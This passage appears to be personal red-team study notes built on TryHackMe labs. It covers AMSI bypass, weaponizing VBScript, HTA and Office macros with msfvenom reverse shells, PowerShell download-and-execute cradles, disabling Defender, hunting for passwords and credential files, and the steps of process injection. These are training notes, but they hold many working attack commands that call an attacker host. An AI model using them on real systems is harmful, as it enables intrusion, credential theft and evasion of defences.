- We should be a domain administrator and have control of the domain controller and we can promote a compromised user to domain admins
## Resources
- https://academy.tcm-sec.com/p/movement-pivoting-and-persistence-for-pentesters-and-ethical-hackers
# AV Evasion
## AMSI Bypass
- [AMSI Bypass – How it works - mdsec](https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/)
- [Amsi-Bypass-Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell)
- [Making AMSI Jump - Offensive Defence](https://offensivedefence.co.uk/posts/making-amsi-jump/)
- [The RIse and Fall of AMSI - Tal Liberman](https://i.blackhat.com/briefings/asia/2018/asia-18-Tal-Liberman-Documenting-the-Undocumented-The-Rise-and-Fall-of-AMSI.pdf)
- [OffensiveNim - AMSI Patch](https://github.com/byt3bl33d3r/OffensiveNim/blob/master/src/amsi_patch_bin.nim)
- [Hunting for AMSI bypasses- Wee-Jing Chung](https://blog.f-secure.com/hunting-for-amsi-bypasses/)
- [Using Reflection for AMSI Bypass - redteam cafe](https://www.redteam.cafe/red-team/powershell/using-reflection-for-amsi-bypass)
- [AMSI Fail](https://amsi.fail/)
- [Memory Patching AMSI Bypass](https://rastamouse.me/blog/asb-bypass-pt2/)
- [How to bypass AMSI and execute ANY malicious Powershell code](https://0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html)
- [Introduction to Sandbox Evasion and AMSI Bypasses - Jake Krasnov, Anthony Rose, Vincent Rose](https://www.youtube.com/watch?v=F_BvtXzH4a4)
- [Evading Detection: A Beginner's Guide to Obfuscation](https://www.youtube.com/watch?v=lP2KF7_Kwxk)
- [Exploring PowerShell AMSI and Logging Evasion](https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/)
- [AMSITrigger v3](https://github.com/RythmStick/AMSITrigger)
- [Bypass AMSI by manual modification](https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/)
## Resources
- https://tryhackme.com/room/hololive
# Weaponization
Weaponizatiion is when red teamers use their own crafted tools to exploit a target
## Windows Scripting Host (WSH)
Windows scripting host is a built-in Windows administration tool that runs batch files to automate and manage tasks within the operating system.
It uses VBScript
### Showing a message box
- Windows message box
```
Dim message
message = "Hello"
MsgBox message
```
- run it in cmd: `wscript hello.vbs`
### Use it to run exe files
- Run an exe file with VBScript
```
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True
```
- Execute it with wscript or cscript in cmd: `wscript c:\Users\thm\Desktop\calc.vbs` or `cscript.exe c:\Users\thm\Desktop\calc.vbs`
- In case of blacklist, possible to rename in txt and still run it: `wscript /e:VBScript c:\Users\thm\Desktop\payload.txt`
## HTML Application (HTA)
### Using and `ActiveXObject to execute cmd.exe
```
var c= 'cmd.exe'
new ActiveXObject('WScript.Shell').Run(c);
```
- serve the payload `python3 -m http.server 8000`
- Visit the page from the target machine `http://IP-ATTACK-MACHINE:8000/payload.hta` and run it
### Reverse shell
- Create a reverse shell with msfvenom `msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP-ATTACK-MACHINE LPORT=443 -f hta-psh -o thm.hta`
- Launch a listener: `nc -lvp 443`
- The reverse shell is launched when the link is visited from the target machine
- Possible to generate and serve HTA with Metasploit framework `use exploit/windows/misc/hta_server`and we need to set LHOST, LPORT, SRVHOST, Payload we can use this payload `windows/meterpreter/reverse_tcp`
- When the link is visited in the target we get a meterpreter shell
## Visual Basic for Application (VBA)
- We need to use Word
- We open Visual Basic Editor by selecting `view → macros`
- We can give a name to our macro and click create
- We then can make another message box
```
Sub MACRONAME()
MsgBox ("Message in a box")
End Sub
```
- We run the macro with F5
- To execute it automatically we can use after the document is open we need to use AutoOpen and Document_open
```
Sub Document_Open()
MACRONAME
End Sub
Sub AutoOpen()
MACRONAME
End Sub
Sub MACRONAME()
MsgBox ("Message in a box")
End Sub
```
- we save the document in docm or doc
### Execute a bin
```
Sub ExecBin()
Dim payload As String
payload = "calc.exe"
CreateObject("Wscript.Shell").Run payload,0
End Sub
```
### Use msfvenom for VBA
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKING-MACHINE-IP LPORT=443 -f vba
```
- We just need to copy the output in the file
- We set the listener with msfconsole `use exploit/multi/handler` `set payload windows/meterpreter/reverse_tcp` we set also LHOST and LPORT
- When the doc is open in the target machine we get a shell
## PowerShell
- Write something with powershell we open a text editor and put this inside: `Write-Output "something"`
- We save the file with .PS1 extension
- We can execute it from the cmd: `powershell -File thm.ps1`
### Execution policy
- See if we are restricted: `Get-ExecutionPolicy`
- Change it: `Set-ExecutionPolicy -Scope CurrentUser RemoteSigned`
- we can also bypassing when executing the script: `powershell -ex bypass -File script.ps1`
### Getting a reverse shell
- We can use [powercat](https://github.com/besimorhino/powercat)
- We set up a listener `nc -lvp 443`
- We launch powercat `powershell -c "powercat -c ATTACKING-MACHINE-IPP -p 443 -e cmd"`
- We should get a shell
### A great tool to generate reverse shell payloads
- [Revshells.com](https://www.revshells.com/)
## Resources
- https://tryhackme.com/room/weaponization
- https://github.com/infosecn1nja/Red-Teaming-Toolkit#Payload%20Development
# Useful commands with Powershell, cmd and Sysinternals
## Powershell Overview
- Cmdlet format: `Verb-Noun` the output of these cmdlets are objects
- Commom verbs: `Get`, `Start`, `Stop`, `Read`, `Write`, `New`, `Out`.
- `Get-Command` to list all commands
- `Get-Command Verb-*` or `Get-Command *-Noun` to filter the command
- `Get-Help Command-Name` will output help on a command.
### Object manipulation
- `|` Pass output from one cmdlet to another
- An object will contain methods and properties. You can think of methods as functions that can be applied to output from the cmdlet and you can think of properties as variables in the output from a cmdlet
- `Verb-Noun | Get-Member` output methods and properties of the cmdlet
- Example: `Get-Command | Get-Member -MemberType Method`
- One way of manipulating objects is pulling out the properties from the output of a cmdlet and creating a new object. This is done using the Select-Object cmdlet.
- Example: `Get-ChildItem | Select-Object -Property Mode, Name` listing the directories and just selecting the mode and the name.
#### Useful flags
- first - gets the first x object
- last - gets the last x object
- unique - shows the unique objects
- skip - skips x objects
#### Filtering objects
- `Verb-Noun | Where-Object -Property PropertyName -operator Value`
- `Verb-Noun | Where-Object {$_.PropertyName -operator Value}` uses the $_ operator to iterate through every object passed to the Where-Object cmdlet.
- Operators: `Contains` If any item in the property value is an exact match for the specified value/, `EQ` If the property value is the same as the specified value, `GT` If the property value is greater than the specified value
- Full list of operators [here](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/where-object?view=powershell-6)
- Example: `Get-Service | Where-Object -Property Status -eq Stopped` Checking the stopped processes
#### Sort objects
- `Verb-Noun | Sort-Object`
- Example: `Get-ChildItem | Sort-Object` sorting the list of directories
> *Source: [TryHackMe - Throwback](https://tryhackme.com/room/throwback)*
## Downloading files
- `certutil.exe -urlcache -f http://IP-OF-YOUR-WEBSERVER-WHERE-FILES-ARE-HOSTED/file-you-need name-you-want-to-give-the-file` (works also in cmd)
```powershell
PS C:\Users\users\Desktop> certutil.exe -urlcache -f http://192.168.3.28/powerview.ps1 powerview.ps1
**** Online ****
CertUtil: -URLCache command completed successfully.
```
- `wget http://IP-OF-YOUR-WEBSERVER-WHERE-FILES-ARE-HOSTED/file-you-need -OutFile name-you-want-to-give-the-file`
```powershell
PS C:\Users\user\Desktop> wget http://192.168.3.28/powerview.ps1 -OutFile powerview.ps1
```
- `iex (New-Object Net.WebClient).DownloadString('http://IP-OF-YOUR-WEBSERVER-WHERE-FILES-ARE-HOSTED/file-you-need')` will load it in memory without writing it in the disk, we will the be able to run powerview command if we use it to load powerview for instance
```powershell
PS C:\Users\s.chisholm.mayorsec\Desktop> iex (New-Object Net.WebClient).DownloadString('http://192.168.3.28/powerview.ps1')
```
## Offensive Powershell
### Disable AV
- `Set-MpPreference -DisableRealtimeMonitoring $true`
### Using modules
- `Import-Module Module`
- `. .\Module.ps1`
### Enumeration
- Manual enumeration with powershell
### Powershell Remoting
- `Enter-PSSession -ComputerName workstation-01`
- `Enter-PSSession -ComputerName workstation-01 -Credential domain\Username`
- ` Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName workstation-01 -Credential domain\Username` connect to a remote powershell and excute command with ScriptBlock. other command we could do with scriptblock: `ipconfig`, `net user`,...
- `Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections` List AppLocker rules
### Misc
- `Install-Module ActiveDirectoryModule -ScopeCurrentUser` Install a module without admin rights
- `Get-MpComputerStatus` Check Windows Defender Status
- `Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone` Test AppLocker policy
- `Get-HotFix | ft -AutoSize` display hotfixes
- `Get-WmiObject -Class Win32_Product | select Name, Version` display installed software
- `gci (Get-ChildItem)` list named pipes
- `select-string -Path C:\Users\htb-student\Documents\*.txt -Pattern password` Search file contents
- `Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore` search for file extensions
- View Sticky Notes data
```
PS C:\htb> cd .\PSSQLite\
PS C:\htb> Import-Module .\PSSQLite.psd1
PS C:\htb> $db = 'C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
PS C:\htb> Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap
```
- Enumerate schedule task with [Get-ScheduledTask](https://docs.microsoft.com/en-us/powershell/module/scheduledtasks/get-scheduledtask?view=windowsserver2019-ps) `Get-ScheduledTask | select TaskName,State`
- `Get-LocalUser` check the description field of local users
- `Get-WmiObject -Class Win32_OperatingSystem | select Description` Print computer description fields
## DOS CMD
## Downloading files
- `certutil.exe -urlcache -f http://IP-OF-YOUR-WEBSERVER-WHERE-FILES-ARE-HOSTED/file-you-need name-you-want-to-give-the-file`
- `curl.exe -o name-you-want-to-give-the-file http://IP-OF-YOUR-WEBSERVER-WHERE-FILES-ARE-HOSTED/file-you-need`
### Encode and Decode files
- `certutil -encode file1 encodedfile`
- `certutil -decode encodedfile file2`
### System Enumeration
- If we want to grep on specific information we can use `findstr`
`systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"`
```
c:\>systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
System Type: X86-based PC
```
- If we want to see patches and update `wmic qfe`
- `wmic qfe get Caption,Description,HotFixID,InstalledOn`
- List the drives `wmic logicaldisk` `list drives`
- `schtasks` query scheduled task
- `schtasks /query /fo LIST /v`
- `driverquery` will list installed drivers
- `tasklist /svc` get the list of running processes
- `set` display all environment variables
- `wmic product get name` display installed software
- `icacls c:\Windows\System32\config\SAM` check permissions on the SAM file
- `[environment]::OSVersion.Version` check OS version
- `cmd /c echo %PATH%` review path variable
### User Enumeration
- `whoami`will give info on the current user
- `whoami /priv` will give info on the current user and their priv
- `whoami /groups` will give info on groups the current user is in
- `net user` or `net users` will list the user on the machine
- `query user` logged in users
- `echo %USERNAME%` current user
- `net user username` will list info about the with the username mentionned
- `net localgroup` `net localgroup groupname` will give info on group
- `qwinsta` or `query session` other users logged in simultaneously
- `net accounts` Get Password Policy & Other Account Information
### Network Enumeration
- `ipconfig` or `ipconfig /all`
- `arp -a`
- `route print`
- `netstat -ano` list active connections
- `-a`: Displays all active connections and listening ports on the target system.
- `-n`: Prevents name resolution. IP Addresses and ports are displayed with numbers instead of attempting to resolves names using DNS.
- `-o`: Displays the process ID using each listed connection.
- Any port listed as “LISTENING” that was not discovered with the external port scan can present a potential local service. This is when we might need to use port forwarding to investigate the service.
- Check what service runs on a specific port (in the example we will use 8080
- `netstat -ano | findstr 8080`
- From this output we can take the pid and checkout which service it is using tasklist `tasklist | findstr 2164`
#### Scan ports
- `1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.10.10.10",$_)) "Port $_ is open!"} 2>$null` scan some ports on a specific IP
- More commands [here - Pen Test Poster: "White Board" - PowerShell - Built-in Port Scanner! by Matthew Toussain](https://www.sans.org/blog/pen-test-poster-white-board-powershell-built-in-port-scanner/)
### Hunting passwords
- `findstr /si password *.txt` will search for the string "password" in txt files `/si` means it searches in the current directory and all subdirectories (s) and ignore the case (i).
- `findstr /si password *.txt *.ini *.config *.sql` same but also in ini, sql and config files
- `findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml` Search file contents for string
- `findstr /spin "password" *.*` another way
- Unattend.xml files might have passwords in plaintext or base64 encoded
- `C:\Users\username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt` powershell cmd history is also worth looking at
- To check where it is we can use this command `(Get-PSReadLineOption).HistorySavePath`
- We can try to read it `gc (Get-PSReadLineOption).HistorySavePath`
- `foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}` Retrieve the contents of all Powershell history files that we can access as our current user
- Powershell credentials are protected with DPAPI. If we can read them we could recover then in cleartext
- `$credential = Import-Clixml -Path 'C:\scripts\pass.xml'`
- `$credential.GetNetworkCredential().username`
- `$credential.GetNetworkCredential().password`
- `dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*` search for file extensions
- `where /R C:\ *.config` another way
- `C:\Users\\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite` Looking for passwords in Sticky notes
- `strings plum.sqlite-wal` Using strings to view DB File contents
- Other files worth checking
```
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts
C:\ProgramData\Configs\*
C:\Program Files\Windows PowerShell\*
```
- `cmdkey /list` list saved credentials
- `runas /savecred /user:domain\user "COMMAND HERE"` run command as another user
### AV Enumeration
- `sc query windefend` will show if Defender is running
- `sc queryex type= service` will list all running service
- `netsh advfirewall firewall dump` check for firewall
- `netsh firewall show state` similar older command
- `netsh firewall show config` will show the config of the firewall, useful to see blocked ports and other
### Execute dll files
- We can use [Rundll32](https://lolbas-project.github.io/lolbas/Binaries/Rundll32/)
### Execute powershell file
- Sometimes powershell won't launch so we will have to use cmd. It is possible to execute a ps1 script using this trick
- We take the necessary script in our attacking machine
- `python3 -m http.server 80` we serve it to our target with an http server
- `echo IEX(New-Object Net.WebClient).DownloadString('http://ATTACK-MACHINE-IP/script.ps1` we can use this command to download and execute it in our target.
- `powershell -file file.ps1`
## Sysinternals
### Pipelist
[Pipelist](https://docs.microsoft.com/en-us/sysinternals/downloads/pipelist) is useful to enumerate instances of pipes
- `pipelist.exe /accepteula` enumerate instances of named pipes.
### Accesschk
[Accesschk](https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk) is useful to enumerate permissions
- `accesschk.exe /accepteula`
- `accesschk.exe -wuvc Everyone *` list service we can write and to which everyone has access
- `.\accesschk64.exe /accepteula -uwdq "C:\Program Files\"` List of user groups with read and write privs
### schtasks
[schtasks](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks) will let us enumerate scheduled tasks
- `schtasks /query /fo LIST /v`
## LOLBAS (living off the land binaries)
- [Check out LOLBAS project](https://lolbas-project.github.io/)
## Resources
- https://docs.microsoft.com/en-us/powershell/scripting/learn/ps101/07-working-with-wmi?view=powershell-7.1
- https://docs.microsoft.com/en-us/powershell/scripting/developer/cmdlet/approved-verbs-for-windows-powershell-commands?view=powershell-7
- https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters
# Windows Internals
> This documentation has been made using the boxes [Windows Internals](https://tryhackme.com/room/windowsinternals) and [Introduction to Windows API](https://tryhackme.com/room/windowsapi) on tryhackme.
> I recommend you do the boxes as it has questions and will allow you to grasp all the concepts.
## Processes
A process maintains and represents the execution of a program; an application can contain one or more processes. A process has many components that it gets broken down into to be stored and interacted with.
The [Microsoft docs](https://docs.microsoft.com/en-us/windows/win32/procthread/about-processes-and-threads) break down these other components, "Each process provides the resources needed to execute a program. A process has a virtual address space, executable code, open handles to system objects, a security context, a unique process identifier, environment variables, a priority class, minimum and maximum working set sizes, and at least one thread of execution."
Processes are created from the execution of an application. Processes are core to how Windows functions, most functionality of Windows can be encompassed as an application and has a corresponding process.
Examples of processes: MsMpEng (Microsoft Defender), wininit (keyboard and mouse), lsass (credential storage)
Attackers can target processes to evade detections and hide malware as legitimate processes.
Examples of potential attack vectors attackers could use agains processes: Process Injection ([T1055](https://attack.mitre.org/techniques/T1055/)), Process Hollowing ([T1055.012](https://attack.mitre.org/techniques/T1055/012/)), Process Masquerading ([T1055.013](https://attack.mitre.org/techniques/T1055/013/))
Processes have many components; they can be split into key characteristics that we can use to describe processes at a high level.
| Process Component | Purpose |
|-------------------|---------|
|Private Virtual Address Space|Virtual memory addresses that the process is allocated.|
|Executable Program |Defines code and data stored in the virtual address space.|
|Open Handles| Defines handles to system resources accessible to the process.|
|Security Context|The access token defines the user, security groups, privileges, and other security information.|
|Process ID | Unique numerical identifier of the process.|
|Threads | Section of a process scheduled for execution.|
The task manager can report on many components and information about a process. Below is a table with a brief list of essential process details.
|Value/Component | Purpose| Example |
|----------------|--------|---------|
|Name| Define the name of the process, typically inherited from the application |conhost.exe|
|PID|Unique numerical value to identify the process| 7408|
|Status | Determines how the process is running (running, suspended, etc.)| Running|
|User name| User that initiated the process. Can denote privilege of the process | SYSTEM|
## Threads
A thread is an executable unit employed by a process and scheduled based on device factors.
Device factors can vary based on CPU and memory specifications, priority and logical factors, and others.
We can simplify the definition of a thread: "controlling the execution of a process."
Since threads control execution, this is a commonly targeted component. Thread abuse can be used on its own to aid in code execution, or it is more widely used to chain with other API calls as part of other techniques.
Threads share the same details and resources as their parent process, such as code, global variables, etc. Threads also have their unique values and data.
|Component|Purpose|
|---------|-------|
|Stack|All data relevant and specific to the thread (exceptions, procedure calls, etc.)|
|Thread Local Storage | Pointers for allocating storage to a unique data environment|
|Stack Argument | Unique value assigned to each thread|
|Context Structure|Holds machine register values maintained by the kernel|
## Virtual Memory
Virtual memory is a critical component of how Windows internals work and interact with each other. Virtual memory allows other internal components to interact with memory as if it was physical memory without the risk of collisions between applications.
Virtual memory provides each process with a [private virtual address space](https://docs.microsoft.com/en-us/windows/win32/memory/virtual-address-space). A memory manager is used to translate virtual addresses to physical addresses. By having a private virtual address space and not directly writing to physical memory, processes have less risk of causing damage.
The memory manager will also use pages or transfers to handle memory. Applications may use more virtual memory than physical memory allocated; the memory manager will transfer or page virtual memory to the disk to solve this problem.
The theoretical maximum virtual address space is 4 GB on a 32-bit x86 system.
## Dynamic Link Libraries
The [Microsoft docs](https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/dynamic-link-library#:~:text=A%20DLL%20is%20a%20library,common%20dialog%20box%20related%20functions.) describe a DLL as "a library that contains code and data that can be used by more than one program at the same time."
DLLs are used as one of the core functionalities behind application execution in Windows. From the [Windows documentation](https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/dynamic-link-library#:~:text=A%20DLL%20is%20a%20library,common%20dialog%20box%20related%20functions.), "The use of DLLs helps promote modularization of code, code reuse, efficient memory usage, and reduced disk space. So, the operating system and the programs load faster, run faster, and take less disk space on the computer."
When a DLL is loaded as a function in a program, the DLL is assigned as a dependency. Since a program is dependent on a DLL, attackers can target the DLLs rather than the applications to control some aspect of execution or functionality.
- DLL Hijacking ([T1574.001](https://attack.mitre.org/techniques/T1574/001/))
- DLL Side-Loading ([T1574.002](https://attack.mitre.org/techniques/T1574/002/))
- DLL Injection ([T1055.001](https://attack.mitre.org/techniques/T1055/001/))
## Portable Executable Format
Executables and applications are a large portion of how Windows internals operate at a higher level. The PE (Portable Executable) format defines the information about the executable and stored data. The PE format also defines the structure of how data components are stored.
The PE (Portable Executable) format is an overarching structure for executable and object files. The PE (Portable Executable) and COFF (Common Object File Format) files make up the PE format.
PE data is most commonly seen in the hex dump of an executable file. Below we will break down a hex dump of calc.exe into the sections of PE data.
The structure of PE data is broken up into seven components.
The DOS Header defines the type of file.
The MZ DOS header defines the file format as .exe.
The DOS Stub is a program run by default at the beginning of a file that prints a compatibility message. This does not affect any functionality of the file for most users.
The DOS stub prints the message This program cannot be run in DOS mode.
The PE File Header provides PE header information of the binary. Defines the format of the file, contains the signature and image file header, and other information headers.
The PE file header is the section with the least human-readable output.
The Image Optional Header has a deceiving name and is an important part of the PE File Header.
The Data Dictionaries are part of the image optional header. They point to the image data directory structure.
The Section Table will define the available sections and information in the image. Sections store the contents of the file, such as code, imports, and data.
Now that the headers have defined the format and function of the file, the sections can define the contents and data of the file.
|Section|Purpose|
|-------|-------|
|.text|Contains executable code and entry point|
|.data|Contains initialized data (strings, variables, etc.)|
|.rdata or .idata|Contains imports (Windows API) and DLLs.|
|.reloc|Contains relocation information|
|.rsrc|Contains application resources (images, etc.)|
|.debug|Contains debug information|
## Interacting with Windows internals
The most accessible and researched option to interact with Windows Internals is to interface through Windows API calls. The Windows API provides native functionality to interact with the Windows operating system. The API contains the Win32 API and, less commonly, the Win64 API.
Most Windows internals components require interacting with physical hardware and memory.
The Windows kernel will control all programs and processes and bridge all software and hardware interactions. This is especially important since many Windows internals require interaction with memory in some form.
An application by default normally cannot interact with the kernel or modify physical hardware and requires an interface. This problem is solved through the use of processor modes and access levels.
A Windows processor has a user and kernel mode. The processor will switch between these modes depending on access and requested mode.
The switch between user mode and kernel mode is often facilitated by system and API calls. In documentation, this point is sometimes referred to as the "Switching Point."
|User mode|Kernel Mode|
|---------|-----------|
|No direct hardware access |Direct hardware access|
|Creates a process in a private virtual address space |Ran in a single shared virtual address space|
|Access to "owned memory locations"|Access to entire physical memory|
Applications started in user mode or "userland" will stay in that mode until a system call is made or interfaced through an API. When a system call is made, the application will switch modes.
When looking at how languages interact with the Win32 API, this process can become further warped; the application will go through the language runtime before going through the API. The most common example is C# executing through the CLR before interacting with the Win32 API and making system calls.
## Windows API
|User mode|Kernel mode|
|---------|-----------|
|No direct hardware access|Direct hardware access|
|Access to "owned" memory locations|Access to entire physical memory|
### Components of the Windows API
The Win32 API, more commonly known as the Windows API, has several dependent components that are used to define the structure and organization of the API.
Let’s break the Win32 API up via a top-down approach. We’ll assume the API is the top layer and the parameters that make up a specific call are the bottom layer.
|Layer|Explanation|
|-----|-----------|
|API|A top-level/general term or theory used to describe any call found in the win32 API structure.|
|Header files or imports|Defines libraries to be imported at run-time, defined by header files or library imports. Uses pointers to obtain the function address.|
|Core DLLs|A group of four DLLs that define call structures. (KERNEL32, USER32, and ADVAPI32). These DLLs define kernel and user services that are not contained in a single subsystem.|
|Supplemental DLLs|Other DLLs defined as part of the Windows API. Controls separate subsystems of the Windows OS. ~36 other defined DLLs. (NTDLL, COM, FVEAPI, etc.)|
|Call Structures|Defines the API call itself and parameters of the call.
API Calls|The API call used within a program, with function addresses obtained from pointers.|
|In/Out Parameters|The parameter values that are defined by the call structures.|
### OS Libraries
Each API call of the Win32 library resides in memory and requires a pointer to a memory address. The process of obtaining pointers to these functions is obscured because of ASLR (Address Space Layout Randomization) implementations; each language or package has a unique procedure to overcome ASLR.
#### Windows Header File
Microsoft has released the Windows header file, also known as the Windows loader, as a direct solution to the problems associated with ASLR’s implementation. Keeping the concept at a high level, at runtime, the loader will determine what calls are being made and create a thunk table to obtain function addresses or pointers.
Once the windows.h file is included at the top of an unmanaged program; any Win32 function can be called.
#### P/Invoke
Microsoft describes P/Invoke or platform invoke as “a technology that allows you to access structs, callbacks, and functions in unmanaged libraries from your managed code.”
P/invoke provides tools to handle the entire process of invoking an unmanaged function from managed code or, in other words, calling the Win32 API. P/invoke will kick off by importing the desired DLL that contains the unmanaged function or Win32 API call.
### API Call Structure
API calls are the second main component of the Win32 library. These calls offer extensibility and flexibility that can be used to meet a plethora of use cases. Most Win32 API calls are well documented under the [Windows API documentation](https://docs.microsoft.com/en-us/windows/win32/apiindex/windows-api-list)and [pinvoke.net](http://pinvoke.net/).
API call functionality can be extended by modifying the naming scheme and appending a representational character. Below is a table of the characters Microsoft supports for its naming scheme.
|Character|Explanation|
|---------|-----------|
|A|Represents an 8-bit character set with ANSI encoding|
|W|Represents a Unicode encoding|
|Ex|Provides extended functionality or in/out parameters to the API call|
Each API call also has a pre-defined structure to define its in/out parameters. You can find most of these structures on the corresponding API call document page of the [Windows documentation](https://docs.microsoft.com/en-us/windows/win32/apiindex/windows-api-list), along with explanations of each I/O parameter.
### C API Implementations
Microsoft provides low-level programming languages such as C and C++ with a pre-configured set of libraries that we can use to access needed API calls.
The windows.h header file is used to define call structures and obtain function pointers. To include the windows header, prepend the line below to any C or C++ program.
`#include `
#### Commonly Abused API Calls
Several API calls within the Win32 library lend themselves to be easily leveraged for malicious activity.
Several entities have attempted to document and organize all available API calls with malicious vectors, including [SANs](https://www.sans.org/white-papers/33649/) and [MalAPI.io](http://malapi.io/).
While many calls are abused, some are seen in the wild more than others. Below is a table of the most commonly abused API organized by frequency in a collection of samples.
|API Call|Explanation|
|--------|-----------|
|LoadLibraryA|Maps a specified DLL into the address space of the calling process|
|GetUserNameA|Retrieves the name of the user associated with the current thread
GetComputerNameA|Retrieves a NetBIOS or DNS name of the local computer|
|GetVersionExA|Obtains information about the version of the operating system currently running|
|GetModuleFileNameA|Retrieves the fully qualified path for the file of the specified module and process|
|GetStartupInfoA|Retrieves contents of STARTUPINFO structure (window station, desktop, standard handles, and appearance of a process)|
|GetModuleHandle|Returns a module handle for the specified module if mapped into the calling process's address space|
|GetProcAddress|Returns the address of a specified exported DLL function|
|VirtualProtect|Changes the protection on a region of memory in the virtual address space of the calling process|
SetWindowsHookEx|Installs a memory hook into a hook chain to monitor for certain events|
|UnhookWindowsHookEx|Removes an installed hook from the hook chain|
|GetCurrentProcess|Retrieves a pseudo handle for the current process.|
|VirtualAlloc|Reserves, commits, or changes the state of a region of pages in the virtual address space of the calling process.|
|WaitForSingleObject|Waits until the specified object is in the signaled state or the time-out interval elapses|
|CreateThread|Creates a thread to execute within the virtual address space of the calling process|
## Abusing Windows internals
### Abusing Processes
Process injection is commonly used as an overarching term to describe injecting malicious code into a process through legitimate functionality or components.
|Injection Type|Function|
|--------------|--------|
|[Process Hollowing](https://attack.mitre.org/techniques/T1055/012/)|Inject code into a suspended and “hollowed” target process|
|[Thread Execution Hijacking](https://attack.mitre.org/techniques/T1055/003/)|Inject code into a suspended target thread|
|[Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001/)|Inject a DLL into process memory|
|[Portable Executable Injection](https://attack.mitre.org/techniques/T1055/002/)|Self-inject a PE image pointing to a malicious function into a target process|
There are many other forms of process injection outlined by [MITRE T1055](https://attack.mitre.org/techniques/T1055/).
At its most basic level, process injection takes the form of shellcode injection.
At a high level, shellcode injection can be broken up into four steps:
1. Open a target process with all access rights.
2. Allocate target process memory for the shellcode.
3. Write shellcode to allocated memory in the target process.
4. Execute the shellcode using a remote thread.
The steps can also be broken down graphically to depict how Windows API calls interact with process memory.
### Expanding Process Abuse
Similar to shellcode injection, this technique offers the ability to inject an entire malicious file into a process. This is accomplished by “hollowing” or un-mapping the process and injecting specific PE (Portable Executable) data and sections into the process.
At a high-level process hollowing can be broken up into six steps:
1. Create a target process in a suspended state.
2. Open a malicious image.
3. Un-map legitimate code from process memory.
4. Allocate memory locations for malicious code and write each section into the address space.
5. Set an entry point for the malicious code.
6. Take the target process out of a suspended state.
The steps can also be broken down graphically to depict how Windows API calls interact with process memory.
### Abusing Process Components
At a high-level thread (execution) hijacking can be broken up into eleven steps:
1. Locate and open a target process to control.
2. Allocate memory region for malicious code.
3. Write malicious code to allocated memory.
4. Identify the thread ID of the target thread to hijack.
5. Open the target thread.
6. Suspend the target thread.
7. Obtain the thread context.
8. Update the instruction pointer to the malicious code.
9. Rewrite the target thread context.
10. Resume the hijacked thread.
### Abusing DLLs
At a high-level DLL injection can be broken up into six steps:
1. Locate a target process to inject.
2. Open the target process.
3. Allocate memory region for malicious DLL.
4. Write the malicious DLL to allocated memory.
5. Load and execute the malicious DLL.
### Memory Execution Alternatives
Depending on the environment you are placed in, you may need to alter the way that you execute your shellcode. This could occur when there are hooks on an API call and you cannot evade or unhook them, an EDR is monitoring threads, etc.
#### Invoking Function Pointers
The void function pointer is an oddly novel method of memory block execution that relies solely on typecasting.
This technique can only be executed with locally allocated memory but does not rely on any API calls or other system functionality.
This one-liner is the most common form of the void function pointer: `((void(*)())addressPointer)();`
1. Create a function pointer (void(*)(), outlined in red
2. Cast the allocated memory pointer or shellcode array into the function pointer ()addressPointer), outlined in yellow
3. Invoke the function pointer to execute the shellcode ();, outlined in green
This technique has a very specific use case but can be very evasive and helpful when needed.
#### Asynchronous Procedure Calls
From the [Microsoft documentation](https://docs.microsoft.com/en-us/windows/win32/sync/asynchronous-procedure-calls) on Asynchronous Procedure Calls, “An asynchronous procedure call (APC) is a function that executes asynchronously in the context of a particular thread.”
An APC function is queued to a thread through QueueUserAPC. Once queued the APC function results in a software interrupt and executes the function the next time the thread is scheduled.
